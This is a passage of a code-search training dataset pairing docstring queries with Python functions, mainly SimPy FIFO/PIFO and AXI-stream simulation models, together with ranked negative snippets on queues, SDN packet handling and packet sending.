"0.55375904",
"0.5525597",
"0.5518435",
"0.55163574",
"0.55101234",
"0.55012953",
"0.5466736"
] |
0.7163576
|
0
|
State machine to pop data out of the FIFO upon request
|
def pop_sm(self):
while True:
# wait to receive a read request
req = yield self.r_in_pipe.get()
# model read latency
#for i in range(self.read_latency):
yield self.wait_sys_clks(self.read_latency)
# try to read head element
if len(self.items) > 0:
data = self.items[0]
self.items = self.items[1:]
else:
            print("ERROR: FIFO pop_sm: attempted to read from empty FIFO", file=sys.stderr)
data = None
# write data back
self.r_out_pipe.put(data)
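
Stripped of the pipe handshake and the latency modeling, the behaviour this state machine guarantees is simple: the head element leaves first, and a read from an empty FIFO produces None plus an error report. A tiny plain-Python check of just that behaviour (an illustration, not part of the original model):

import sys

def pop_once(items):
    # head-of-list removal with a None sentinel for the empty case
    if items:
        return items.pop(0)
    print("ERROR: attempted to read from empty FIFO", file=sys.stderr)
    return None

fifo = [10, 20, 30]
assert pop_once(fifo) == 10      # head-of-queue order
assert fifo == [20, 30]
assert pop_once([]) is None      # empty-FIFO path returns None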
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def pop_sm(self):\r\n while True:\r\n # wait to receive a read request\r\n req = yield self.r_in_pipe.get()\r\n # model read latency\r\n # for i in range(self.read_latency):\r\n yield self.wait_sys_clks(self.read_latency)\r\n # try to read head element\r\n if len(self.items) > 0:\r\n data = self.items[0]\r\n self.items = self.items[1:]\r\n else:\r\n print >> sys.stderr, \"ERROR: PIFO pop_sm: attempted to read from empty PIFO\"\r\n data = None\r\n # write data back\r\n self.r_out_pipe.put(data)",
"def rw_pifo_sm(self):\r\n data_words = random.sample(range(0, 20), 20)\r\n\r\n # push all data\r\n for word in data_words:\r\n print ('@ {:04d} - pushed data word {}'.format(self.env.now, word))\r\n self.pifo_w_in_pipe.put(word)\r\n ((done, popped_data, popped_data_valid)) = yield self.pifo_w_out_pipe.get() # tuple\r\n if popped_data_valid:\r\n print ('@ {:04d} - popped data word {}'.format(self.env.now, popped_data))\r\n \r\n\r\n # pop all items\r\n for i in range(min(self.pifo_maxsize,len(data_words))):\r\n # submit pop request (value in put is a don't care)\r\n self.pifo_r_in_pipe.put(1) \r\n word = yield self.pifo_r_out_pipe.get()\r\n print ('@ {:04d} - popped data word {}'.format(self.env.now, word))",
"def pop_payload(self):\n payload = self.rdb.lpop(self.key)\n if payload:\n self.pool.spawn(self.send, json.loads(payload.decode(\"utf-8\")))\n else:\n gevent.sleep(5)",
"def push_sm(self):\r\n while True:\r\n # wait to receive incoming data\r\n data = yield self.w_in_pipe.get()\r\n # model write latency\r\n #for i in range(self.write_latency):\r\n yield self.wait_sys_clks(self.write_latency)\r\n # try to write data into FIFO\r\n if len(self.items) < self.maxsize:\r\n self.items.append(data)\r\n else:\r\n print >> sys.stderr, \"ERROR: FIFO push_sm: FIFO full, cannot push {}\".format(data)\r\n # indicate write_completion\r\n if self.w_out_pipe is not None:\r\n done = 1\r\n self.w_out_pipe.put(done)",
"def pop_write(self):\n ...",
"def dequeue(self):",
"def __del__(self):\n\t\tif self.ispersist() and self._input:\n\t\t\t\tpservlet.pipe_push_state(self._pipe_desc, self._state)",
"def push_sm(self):\r\n popped_data = 0\r\n\r\n while True:\r\n popped_data_valid = 0\r\n # wait to receive incoming data\r\n data = yield self.w_in_pipe.get()\r\n # model write latency\r\n #for i in range(self.write_latency):\r\n yield self.wait_sys_clks(self.write_latency)\r\n # first enque the item\r\n self.items.append(data)\r\n # then insert in the correct position and shift (sorting)\r\n #for i in range(self.shift_latency):\r\n yield self.wait_sys_clks(self.shift_latency)\r\n self.items.sort()\r\n if len(self.items) > self.maxsize : # Peixuan Q: what if len = maxsize, should we keep the data?\r\n popped_data = self.items.pop(len(self.items)-1)\r\n popped_data_valid = 1\r\n # indicate write_completion\r\n if self.w_out_pipe is not None:\r\n done = 1\r\n self.w_out_pipe.put((done, popped_data, popped_data_valid)) # tuple\r",
"def consumer(state: SharedState):",
"def pop():",
"def dequeue(self):\n pass",
"def dequeue(self):\n pass",
"def move(self):\n active_item = self.stack.pop()\n self.backlog.put(active_item)",
"def consume(self):\n self._stored = self._stored - 1",
"def take_action(self, state):",
"def on_receive(self):\n self.state = RECEIVED",
"def pop(self):",
"def pop(self):",
"def processIncoming(self):\n while self.queue.qsize():\n try:\n # print 'queue'\n msg = self.queue.get(0)\n # Check contents of message and do what it says\n # As a test, we simply print it\n if msg == \"exit\":\n self.deviceError()\n if msg == \"error\":\n self.deviceError()\n else:\n self.decode(msg)\n except Queue.Empty:\n pass",
"def pop(self):\n data = self.buffer.getvalue()\n self.buffer.seek(0)\n self.buffer.truncate()\n return data",
"def AdvanceQueue(self):\r\n self.data.pop(0)\r\n return",
"def recv_maintain(self):\n while True:\n # maintain the state list size\n while len(self.state_list) > self.state_list_size:\n self.state_list = self.state_list[(len(self.state_list) - self.state_list_size):]\n\n # read from socket, decode the message, and append to state buffer\n try:\n mesg = self.sock.recv(1024).decode()\n time.sleep(1/self.recv_rate)\n except socket.error as e:\n err = e.args[0]\n # no data in buffer for non-blocking socket to copy\n if err == errno.EAGAIN or err == errno.EWOULDBLOCK:\n mesg = None\n # other error occurs\n else:\n sys.exit(1)\n else:\n self.state_buf_str += mesg\n update_state = self.state_str_parse()\n if update_state is not None:\n for state in update_state:\n self.state_list.append(state)\n update_state = None",
"def init():\n state = {'last_action': None, 'order': None, 'stop_loss_order': None, 'stop_loss_price': None}\n\n order = get_open_order()\n if order:\n if order.type != 'stop':\n LOG.warning('Pending %s', order)\n order_state_before_cancel = cancel_order(order)\n act = read_action()\n if act.startswith('-'):\n LOG.warning('Pending action was %s', act)\n if order_state_before_cancel == 'open':\n state['last_action'] = buy_or_sell()\n # pending ma order filled\n else:\n state['order'] = order\n state['last_action'] = state['last_action'][1:]\n write_action(state['last_action'])\n LOG.info('Writing new last action %s', state['last_action'])\n return state\n state['stop_loss_order'] = order\n state['stop_loss_price'] = order.price\n if RESET:\n LOG.info('Reset requested, ignoring last action')\n state['last_action'] = 'NIX'\n state['stop_loss_order'] = None\n state['stop_loss_price'] = None\n return state\n\n state['last_action'] = read_action()\n if not state['last_action']:\n # first run\n state['last_action'] = buy_or_sell()\n write_action(state['last_action'])\n return state\n # pending ma order filled\n if state['last_action'].startswith('-'):\n LOG.warning('Pending action was %s', state['last_action'])\n state['last_action'] = state['last_action'][1:]\n write_action(state['last_action'])\n LOG.info('Writing new last action %s', state['last_action'])\n\n order = get_closed_order()\n if order and order.type != 'stop':\n state['order'] = order\n return state",
"def example_one():\n fifo = deque()\n fifo.append(1) # Producer\n x = fifo.popleft() # Consumer",
"def __init__(self):\r\n self.queue = []\r\n self.current = False",
"def _flow_in(self):\n print(\"MESSENGER: flow_in online!\")\n while self.running:\n data = b\"\"\n while data[-5:] != b\"ROGER\" and self.running:\n try:\n slc = self.sock.recv(1024)\n except socket.timeout:\n time.sleep(0.1)\n except socket.error as E:\n print(\"MESSENGER: caught socket exception:\", E)\n self.teardown(1)\n except Exception as E:\n print(\"MESSENGER: generic exception:\", E)\n self.teardown(1)\n else:\n data += slc\n if not self.running:\n if data:\n print(\"MESSENGER: data left hanging:\" + data[:-5].decode(\"utf8\"))\n return\n data = data[:-5].decode(\"utf8\")\n self.recvbuffer.extend(data.split(\"ROGER\"))\n print(\"MESSENGER: flow_in exiting...\")",
"def callback(self, data):\n self.state = data.data\n #rospy.loginfo('HEARD')",
"def pop(self):\n pass",
"def step(self):\n # Pull data from the first available input channel.\n\n input_bag = self.get()\n\n # todo add timer\n self.handle_results(input_bag, input_bag.apply(self._stack))",
"def __init__(self):\n self.push_queue = []\n self.pop_queue = []"
] |
[
"0.6621711",
"0.649071",
"0.6357225",
"0.6148396",
"0.5974678",
"0.59630424",
"0.587258",
"0.58450246",
"0.5842207",
"0.5821833",
"0.5777409",
"0.5777409",
"0.57464164",
"0.56125146",
"0.55776095",
"0.556682",
"0.5514615",
"0.5514615",
"0.5500672",
"0.5438145",
"0.5423421",
"0.54179674",
"0.5410937",
"0.5400311",
"0.5399637",
"0.53910285",
"0.5377419",
"0.5374858",
"0.53729653",
"0.5372324"
] |
0.7223649
|
0
|
State machine to pop data out of the PIFO upon request
|
def pop_sm(self):
while True:
# wait to receive a read request
req = yield self.r_in_pipe.get()
# model read latency
# for i in range(self.read_latency):
yield self.wait_sys_clks(self.read_latency)
# try to read head element
if len(self.items) > 0:
data = self.items[0]
self.items = self.items[1:]
else:
            print("ERROR: PIFO pop_sm: attempted to read from empty PIFO", file=sys.stderr)
data = None
# write data back
self.r_out_pipe.put(data)
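
This pop side is nearly identical to the FIFO version apart from the error string; what makes it a PIFO is that the push side keeps the items sorted, so the element handed out here is always the smallest one enqueued so far. A hedged standalone sketch of that ordering using heapq instead of the model's list.sort(), with the same drop-the-largest overflow rule (illustrative only, not the simulation code):

import heapq

class MiniPifo:
    def __init__(self, maxsize):
        self.maxsize = maxsize
        self.heap = []

    def push(self, item):
        heapq.heappush(self.heap, item)
        if len(self.heap) > self.maxsize:
            largest = max(self.heap)      # overflow: evict the largest element,
            self.heap.remove(largest)     # as the sorted-list model does
            heapq.heapify(self.heap)      # restore the heap invariant after removal
            return largest
        return None

    def pop(self):
        return heapq.heappop(self.heap) if self.heap else None

pifo = MiniPifo(maxsize=3)
dropped = [pifo.push(word) for word in (7, 2, 9, 4)]
print(dropped)                          # [None, None, None, 9] -- 9 evicted on overflow
print([pifo.pop() for _ in range(3)])   # [2, 4, 7] -- priority order, not arrival order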
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def __del__(self):\n\t\tif self.ispersist() and self._input:\n\t\t\t\tpservlet.pipe_push_state(self._pipe_desc, self._state)",
"def callback(self, data):\n self.state = data.data\n #rospy.loginfo('HEARD')",
"def pop_payload(self):\n payload = self.rdb.lpop(self.key)\n if payload:\n self.pool.spawn(self.send, json.loads(payload.decode(\"utf-8\")))\n else:\n gevent.sleep(5)",
"def rw_pifo_sm(self):\r\n data_words = random.sample(range(0, 20), 20)\r\n\r\n # push all data\r\n for word in data_words:\r\n print ('@ {:04d} - pushed data word {}'.format(self.env.now, word))\r\n self.pifo_w_in_pipe.put(word)\r\n ((done, popped_data, popped_data_valid)) = yield self.pifo_w_out_pipe.get() # tuple\r\n if popped_data_valid:\r\n print ('@ {:04d} - popped data word {}'.format(self.env.now, popped_data))\r\n \r\n\r\n # pop all items\r\n for i in range(min(self.pifo_maxsize,len(data_words))):\r\n # submit pop request (value in put is a don't care)\r\n self.pifo_r_in_pipe.put(1) \r\n word = yield self.pifo_r_out_pipe.get()\r\n print ('@ {:04d} - popped data word {}'.format(self.env.now, word))",
"def take_action(self, state):",
"def pop_sm(self):\r\n while True:\r\n # wait to receive a read request\r\n req = yield self.r_in_pipe.get()\r\n # model read latency\r\n #for i in range(self.read_latency):\r\n yield self.wait_sys_clks(self.read_latency)\r\n # try to read head element\r\n if len(self.items) > 0:\r\n data = self.items[0]\r\n self.items = self.items[1:]\r\n else:\r\n print >> sys.stderr, \"ERROR: FIFO pop_sm: attempted to read from empty FIFO\"\r\n data = None\r\n # write data back\r\n self.r_out_pipe.put(data)",
"def _get_state(self):",
"def _localSetState(self,pdict):\n self.n = pdict.pop('n')\n self.p = pdict.pop('p')",
"def state_processing_do(cfg, app, win, events):",
"def _localSetState(self,pdict):\n self.p = pdict.pop('p')",
"def _localSetState(self,pdict):\n self.p = pdict.pop('p')",
"def pop(state):\n return state.env.stack.pop()",
"def pull(self):",
"def _localSetState(self,pdict):\n super()._localSetState(pdict)\n self.p = pdict.pop('p')",
"def pop():",
"def __getstate__(self):\n return None",
"def final(self, state):\n \"*** YOUR CODE HERE ***\"\n return\n util.raiseNotDefined()",
"def pop_write(self):\n ...",
"def __state_cb(self, data):\n self.state = data",
"def test_pop_objects(self):\r\n tape = copy.deepcopy(self.tape)\r\n tape.populate_database_objects()\r\n eq_(tape.notes[1].state, 'PA')",
"def step(self):\n # Pull data from the first available input channel.\n\n input_bag = self.get()\n\n # todo add timer\n self.handle_results(input_bag, input_bag.apply(self._stack))",
"def pull(self):\n raise NotImplementedError()",
"def state_finish_do(cfg, app, win, events):",
"def act(self, state):\n return",
"def pop(self, *args, **kwargs): # real signature unknown\n pass",
"def _localSetState(self,pdict):\n super()._localSetState(pdict)\n self.transition = pdict.pop('transition')\n self.steadyStatePb = pdict.pop('steadyStatePb')",
"def state_processing_exit(cfg, app, win):",
"def pop(self):",
"def pop(self):",
"def clear(self):\r\n self._state[\"data\"].clear()\r\n self._state[\"session\"].request_rerun()"
] |
[
"0.6127213",
"0.60501",
"0.5966249",
"0.58384705",
"0.5765319",
"0.5569881",
"0.55665207",
"0.5544534",
"0.55201185",
"0.5505476",
"0.5505476",
"0.54195637",
"0.5391677",
"0.5345437",
"0.5333264",
"0.5328006",
"0.5309682",
"0.5281757",
"0.52800685",
"0.525747",
"0.52553725",
"0.52538764",
"0.522771",
"0.52213925",
"0.52199703",
"0.5219024",
"0.51964295",
"0.5180805",
"0.5180805",
"0.5179464"
] |
0.62425005
|
0
|
Send pkt_list over AXI_stream interface
|
def write_pkts(self, pkt_list):
while True:
# wait for the next transmission
yield self.wait_sys_clks(1)
# send one word at a time
if len(pkt_list) == 0:
# no more data to send so send blanks
tdata = '\x00'*self.bus_width
tuser = Tuser(0, 0, 0)
msg = AXI_S_message(tdata,0,0,0,tuser)
self.out_pipe.put(msg)
else:
# send packets
pkt = pkt_list[0]
yield self.env.process(self.send_pkt(pkt))
# remove the pkt we just sent from the pkt_list
pkt_list = pkt_list[1:]
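
Each call to send_pkt cuts a packet into bus-width words with tkeep/tlast side-band signals before the loop above pushes them out one per clock. A hedged standalone sketch of that segmentation math follows; it is based on the send_pkt helper shown among the negatives (which, as reproduced there, never asserts tlast), so the tlast handling here is an assumption rather than verified behaviour.

def segment_packet(pkt_bytes, bus_width):
    words = []
    for offset in range(0, len(pkt_bytes), bus_width):
        chunk = pkt_bytes[offset:offset + bus_width]
        last = offset + bus_width >= len(pkt_bytes)          # final word of the packet?
        tdata = chunk + b"\x00" * (bus_width - len(chunk))   # zero-pad the final word
        tkeep = (1 << len(chunk)) - 1                        # one bit per valid byte
        words.append((tdata, tkeep, int(last)))
    return words

for tdata, tkeep, tlast in segment_packet(b"HELLOWORLD", bus_width=4):
    print(tdata, bin(tkeep), tlast)
# 10 bytes on a 4-byte bus -> three words; only the last carries tkeep=0b11 and tlast=1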
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def send_sus_list(key):\n while True:\n if not receive_sus():\n signature = key.create_signature(json.dumps(SUS) + '2')\n\n pack_send = Ether(dst='98:98:98:22:22:22') / \\\n IP(dst='172.16.104.16') / \\\n UDP(dport=2223, sport=2223) / \\\n DB(len_sign=len(signature), cmd=2,\n send_num=5, param=signature + json.dumps(SUS).encode())\n\n conf.iface = 'eth0'\n sendp(pack_send)",
"def do_send_list( self, a_list ):\r\n # --- this needs to be moved to task some set up here then on there\r\n self.logger.info( \"turn on sendList\" )\r\n self.send_list_ix = 0\r\n\r\n #self.send_list = [ 180, 920, 160, 1740, 160, 780, 160, 2840, 160, 1320, 160, 1340, 160, ] # 1180, 160, 2700, 160, 12780, 200, 920, \\\r\n #160, 2680, 160, 780, 160, 800, 160, 780, 160, 920, 160, 800, 140, 800, \\\r\n # 160 ]\r\n self.send_list = a_list\r\n self.com_driver.send( \"z\\n\" )\r\n self.list_send = True # if we were mult-threaded this would have to be here\r\n\r\n return",
"def write_to_pipe(self, event_list):\n self.pipe.send_bytes(b''.join(event_list))",
"def send_pkt(self, pkt_tuple):\r\n pkt_str = str(pkt_tuple[0])\r\n tuser = pkt_tuple[1]\r\n while len(pkt_str) > self.bus_width:\r\n # at least one more word of this packet after this one\r\n tdata = pkt_str[0:self.bus_width]\r\n tvalid = 1\r\n tkeep = (1<<self.bus_width)-1\r\n tlast = 0\r\n msg = AXI_S_message(tdata, tvalid, tkeep, tlast, tuser)\r\n self.out_pipe.put(msg)\r\n yield self.wait_sys_clks(1)\r\n pkt_str = pkt_str[self.bus_width:]\r\n # this is the last word of the packet\r\n tdata = pkt_str + '\\x00'*(self.bus_width - len(pkt_str))\r\n tvalid = 1\r\n tkeep = (1<<len(pkt_str))-1\r\n tlast = 0\r\n msg = AXI_S_message(tdata, tvalid, tkeep, tlast, tuser)\r\n self.out_pipe.put(msg)",
"def send_pkts(self):\n pkts = self.__create_packets()\n sendpfast(pkts, pps=self.pps, iface=self.iface)",
"def send_packets (self):\n for lindex in self.enabled_lindex:\n self.send_packets_lindex(lindex)",
"def apply(self, pkt_list):\n pkt_list.display()\n\n return pkt_list",
"def SendPacketsElements(self) -> _n_0_t_7[SendPacketsElement]:",
"def forward(self, srcip, packet): #gets entire packet and srcip of that packet\n # get route to send packet\n best_route = self.get_route(srcip, packet[DEST]) #is a socket\n\n sock = best_route\n\n\n jsonpack = json.dumps(packet)\n sock.sendall(jsonpack.encode())\n # TODO fix src and dest\n return True",
"def parsePacket(pkt,SubList):\r\n #print the packet\r\n #pkt.displayPacket()\r\n #get the data type\r\n data_type = pkt.getDataType()\r\n #get the identifier\r\n identifier = pkt.getID()\r\n #check for subscribers internal and external\r\n sendList = []\r\n currentTime = time.time()\r\n for s in SubList:\r\n #check for the correct sub\r\n if s.TYPE == data_type:\r\n if s.ID == identifier:\r\n #Check the request rate\r\n if((currentTime - s.getLastTime()) >= s.getRequestTime()):\r\n s.setLastTime(currentTime) #update the last time it was sent\r\n sendList.append(s) #Add it to the list\r\n #Return send list\r\n return sendList",
"def _send(self, msg, adb_info):\n packed = msg.pack()\n _LOGGER.debug(\"bulk_write(%d): %r\", len(packed), packed)\n self._transport.bulk_write(packed, adb_info.transport_timeout_s)\n\n if msg.data:\n _LOGGER.debug(\"bulk_write(%d): %r\", len(msg.data), msg.data)\n self._transport.bulk_write(msg.data, adb_info.transport_timeout_s)",
"def create_stream(cls, packet_count=test_packet_count):\n for i in range(0, packet_count):\n info = cls.create_packet_info(cls.src_dst_if, cls.src_dst_if)\n payload = cls.info_to_payload(info)\n p = (\n Ether(dst=cls.src_dst_if.local_mac, src=cls.src_dst_if.remote_mac)\n / IP(\n id=info.index,\n src=cls.src_dst_if.remote_ip4,\n dst=cls.src_dst_if.local_ip4,\n )\n / ICMP(type=\"echo-request\", id=1234)\n / Raw(payload)\n )\n cls.extend_packet(p, 1518, cls.padding)\n info.data = p",
"def OnESPacket(current_pid, packet, header_size):\n pass",
"def send_packet(self, raw_packet):\n\n if self.verbose:\n print(\"< %s\" % \" \".join(\"%02x\" % i for i in raw_packet))\n\n # Send the data to the device.\n self.ftdi.write(self.ftdi.INTERFACE_A, raw_packet, async_=False)",
"def sendBuffer():\n dislin.sendbf()",
"def process(self, pkt):\n pass",
"def act_like_hub (self, packet, packet_in):\n # We want to output to all ports -- we do that using the special\n # OFPP_ALL port as the output port. (We could have also used\n # OFPP_FLOOD.)\n self.resend_packet(packet_in, of.OFPP_ALL)\n\n # Note that if we didn't get arp_req valid buffer_id, arp_req slightly better\n # implementation would check that we got the full data before\n # sending it (len(packet_in.data) should be == packet_in.total_len)).",
"def _send(self, frame):\n \n self.device.write(frame)",
"def start_streams(self, stream_list, get_result=False):\n for stream_id in stream_list:\n self.send_stream(stream_id, get_result=get_result)",
"def send_traffic_data(serialport, pack):\n pack[0] = 0x01\n pack[1] = 0x00\n serialport.write(pack)\n logging.debug(\"Traffic Data - Sent.\")\n logging.debug(str(pack))",
"def send_protobuf(stream_name_, plugin_id, pkg_list, stream_manager):\n protobuf = MxProtobufIn()\n protobuf.key = \"appsrc{}\".format(plugin_id).encode('utf-8')\n protobuf.type = b\"MxTools.MxpiTensorPackageList\"\n protobuf.protobuf = pkg_list.SerializeToString()\n protobuf_vec = InProtobufVector()\n protobuf_vec.push_back(protobuf)\n err_code = stream_manager.SendProtobuf(\n stream_name_, plugin_id, protobuf_vec)\n if err_code != 0:\n logging.error(\n \"Failed to send data to stream, stream_name(%s), plugin_id(%s), element_name(%s), \"\n \"err_code(%s).\", stream_name_, plugin_id,\n \"appsrc{}\".format(plugin_id).encode('utf-8'), err_code)\n return False\n return True",
"def on_iteration(self):\n for stream_id in list(self.send_streams.keys()):\n self.send_headers(stream_id)\n self.send_data(stream_id)",
"def _packet_in(self, ev):\n\n dp = ev.msg.datapath\n ofp = dp.ofproto\n parser = dp.ofproto_parser\n match = ev.msg.match\n\n ##SNDCP packet with multiple fragments recieved - print warning, send ICMP fragmentation needed\n ##TODO: Not WOrking correctly\n ## File \"/usr/local/lib/python2.7/dist-packages/ryu/ofproto/ofproto_v1_3_parser.py\", line 746, in __getitem__\n ## return dict(self._fields2)[key]\n ## KeyError: 'udp_dst'\n\n # if (match['eth_type'] == 0x0800 and match['ip_proto'] == inet.IPPROTO_UDP\n # and match['udp_dst'] == VGSN_PORT and match['sndcp_first_segment'] == 1\n # and match['sndcp_more_segments'] == 1):\n # _icmp_send(dp,match['in_port'],match['ipv4_dst'],match['ipv4_src'],match['eth_dst'],match['eth_src'],icmp_type=3,icmp_code=4)\n # LOG.warning('WARNING: Device with IP: '+match['ipv4_src']+' sent fragmented sndcp packet')\n # return\n\n ##ARP request recieved - send 'I'm here' response\n if match['eth_type'] == 0x0806 and match['arp_op'] == 1:\n LOG.debug(\"ARP request accepted\")\n _arp_send(dp=dp, port_out=match['in_port'], arp_code=2, eth_dst=match['eth_src'], eth_target=match['arp_sha'],\n ip_target=match['arp_spa'], ip_sender=match['arp_tpa'])\n LOG.debug('Reply to '+match['arp_spa'] +': Host '+match['arp_tpa']+' is at forwarder '+str(dp.id) + \" with ethX source MAC address\")\n return\n\n ##ARP response with target_ip==DISCOVERY_ARP_IP recieved - we found APN\n #\n # FIXED: All ARP responses are replied, regardless of the target IP\n #\n # TODO : At this point only ARPs belonging to the APNs networks subnet should\n # be answered\n if match['eth_type'] == 0x0806 and match['arp_op'] == 2:\n LOG.debug('TUNNEL MNGR: ARP response with target APN discovery IP recieved at controller, processing for APN extraction')\n pkt = packet.Packet(array.array('B', ev.msg.data))\n arp_pkt=pkt.get_protocol(arp.arp)\n apn_ip = arp_pkt.src_ip\n apn_mac= arp_pkt.src_mac\n port = match['in_port']\n\n ##Search for apn in APN_POOL to add mac addr. and update topology\n for sApn in APN_POOL:\n if sApn.ip_addr == apn_ip:\n LOG.debug('Recieved ARP response was from ' + sApn.name + ' APN')\n sApn.eth_addr = apn_mac\n sApn.port = port\n sApn.dpid = dp.id\n # Links towards APNs will not be measured\n topo.add_link(dp.id,str(sApn.name),port)\n topo.add_link(str(sApn.name),dp.id,0)\n topo.reload_topology()\n LOG.debug('TUNNEL MNGR: APN '+str(sApn.name)+' found at forwarder: '+str(dp.id)+', port: '+str(port) + ' by ARP search')\n\n ##Add special rules to edge forwarder\n self.on_edge_inet_dp_join(dp, port, sApn)\n\n # FIX: We do not handle bss as a special APN\n # For greater extensibility, BSS/UTRAN/LAN APNs (exit/enter) points\n # will be handled in a generic manner\n #\n ##Create MAC-tunnels between APN and all BSSs\n #for bss in BSS_POOL:\n # self.add_tunnel(bss,apn)\n #break\n\n ### WMNC: In this case, we are not making tunnels between\n # two types of ingress/egress point, but actually same type\n\n for dApn in APN_POOL:\n # we are cycling through all possible APNs, looking for different APN tupples\n # with filled HW addresses (already found by APN search)\n if sApn != dApn and dApn.eth_addr != None:\n LOG.debug('TUNNEL MNGR: Different APNs with filled HW address found, lets find out if there is tunnel between them')\n\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('TUNNEL MNGR: No path between: ' + sApn.name + ' and ' + dApn.name + '. 
Retry when next APN discovered.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n\n\n return\n\n ##ICMP echo with dst_ip==DISCOVERY_IP_DST recieved - new link between forwarders is up\n if match['eth_type'] == 0x0800 and match['ipv4_dst'] == DISCOVERY_IP_DST and match['ip_proto'] == 1:\n #LOG.debug('TOPO MNGR: ICMP echo recieved at controller, processing for link extraction or latency measurement')\n\n pkt = packet.Packet(array.array('B', ev.msg.data))\n\n ##Discovery pings carry information about sending datapath in payload of icmp packet\n ##these information are in Dictionary format, we parse the out with _icmp_parse_payload() method\n body = _icmp_parse_payload(pkt)\n neighbourDPID=body['dpid']\n neighbourPort=body['port_out']\n\n ## measurement\n ## currentClock moved way up to improve precision\n receivedClock=float(body['clock'])\n currentClock = time.clock()\n latency = currentClock - receivedClock\n\n currentDate = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n ##Update latency or add new edges to topology.\n if topo.DynamicGraph.has_edge(dp.id, neighbourDPID) and topo.DynamicGraph.has_edge(neighbourDPID, dp.id):\n topo.StaticGraph[neighbourDPID][dp.id]['pdv'] = topo.StaticGraph[neighbourDPID][dp.id]['lat'] - latency\n topo.StaticGraph[neighbourDPID][dp.id]['lat'] = latency\n topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n #topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n loss = self.loss_update(neighbourDPID, dp.id, currentDate)\n #LOG.debug('TOPO MNGR: Updating latency ' + str(latency) + ' and date ' + str(currentDate) + ' LOSS: ' + str(loss))\n topo.reload_topology()\n else:\n ## latency not correct for both directions when adding links\n ## update occurs on receive of next measurement packet from oposite direction\n topo.add_link(dp.id, neighbourDPID, ev.msg.match['in_port'], latency, currentDate)\n topo.add_link(neighbourDPID, dp.id, neighbourPort , latency, currentDate)\n LOG.debug('TOPO MNGR: Topology changed: New link between forwarder ID '+str(dp.id)+ ' via port ' + str(ev.msg.match['in_port'])\n +' and forwarder ID '+str(neighbourDPID)+ ' via port ' + str(neighbourPort) + ' was discovered.')\n\n topo.reload_topology()\n ## retry to create tunnels\n ## find better paths between APNs\n for sApn in APN_POOL:\n for dApn in APN_POOL:\n if sApn != dApn:\n LOG.debug('TOPO MNGR: Topology changed: trying to re-build inactive tunnel between:' + sApn.name + ' and ' + dApn.name)\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('No path between: ' + sApn.name + ' and ' + dApn.name + '. 
Retry when next fwd connects.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n return\n\n # flow of last resort (process for routing)\n if match['eth_type'] == 0x0800:\n # LOG.debug('*****************Flow of last resort matched(plain IP), process for routing********'\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'] + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp'])))\n ## Not very proud of myself, but it will do the trick\n ## Turbo lumberjack routing logic\n ## TODO: Implement a longest prefix match routing\n\n candidates = []\n\n for source, destination, ip_dscp in routesList:\n if ((source == match['ipv4_dst'] and destination == match['ipv4_src']) or (source == match['ipv4_src'] and destination == match['ipv4_dst'])) and ip_dscp == match['ip_dscp']:\n # LOG.debug('ROUTING: route source: ' + str(source) + 'destination: ' + str(destination)\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'])\n # + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(ip_dscp)\n # + ' already exists, aborting addition of new route')\n return\n\n for tunnel in TUNNELS:\n if (tunnel.sApn.ip_addr == match['ipv4_dst'] and tunnel.dApn.ip_addr == match['ipv4_src']) or (tunnel.sApn.ip_addr == match['ipv4_src'] and tunnel.dApn.ip_addr == match['ipv4_dst']):\n LOG.debug('ROUTING: Tunnel candidate found in list of tunnels. Adding tunnel path: ' + str(tunnel.po_edges) + ' to candidates.')\n candidates.append(tunnel)\n\n trafficClass = self.TC_selection(match['ip_dscp'])\n\n if len(candidates) == 0:\n LOG.debug('ROUTING: match[ipv4_dst]: ' + str(match['ipv4_dst'])\n + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp']))\n LOG.debug('ROUTING: ERROR, NO feasible tunnels for such route.')\n return\n\n LOG.debug('Looking for tunnels: DST_IP: ' + match['ipv4_dst'] + ' SRC_IP: ' + match['ipv4_src'] + ' DSCP: ' + str(match['ip_dscp']) + '(traffic class: ' + str(trafficClass) + ')' + ' Incoming from FWD: ' + str(dp.id))\n tunnel = self.tunnel_selection(trafficClass, candidates)\n LOG.debug('TE MNGR: Selected tunnel Path out: ' + str(tunnel.path_out_str) + ' meter_id: ' + str(tunnel.meter_id))\n\n dscp = match['ip_dscp']\n\n ## meter_id\n ## 2,4,6,8,10 = 500kbps, 1,3,5,7,9 = 1000kbps ...\n ## 0 = 100Gbps\n meter_id = tunnel.meter_id\n\n #\n # FIXME: incomplete set of rules installed on LAN Access forwarders\n # TODO : Philosophy of table IDs should be clarified, as now it total mess!!!\n # TODO : this should be done only once, from that moment, all user plane packets\n # should travelse only forwarder and should not be sent to controller\n\n\n\n #WAY OUT\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch 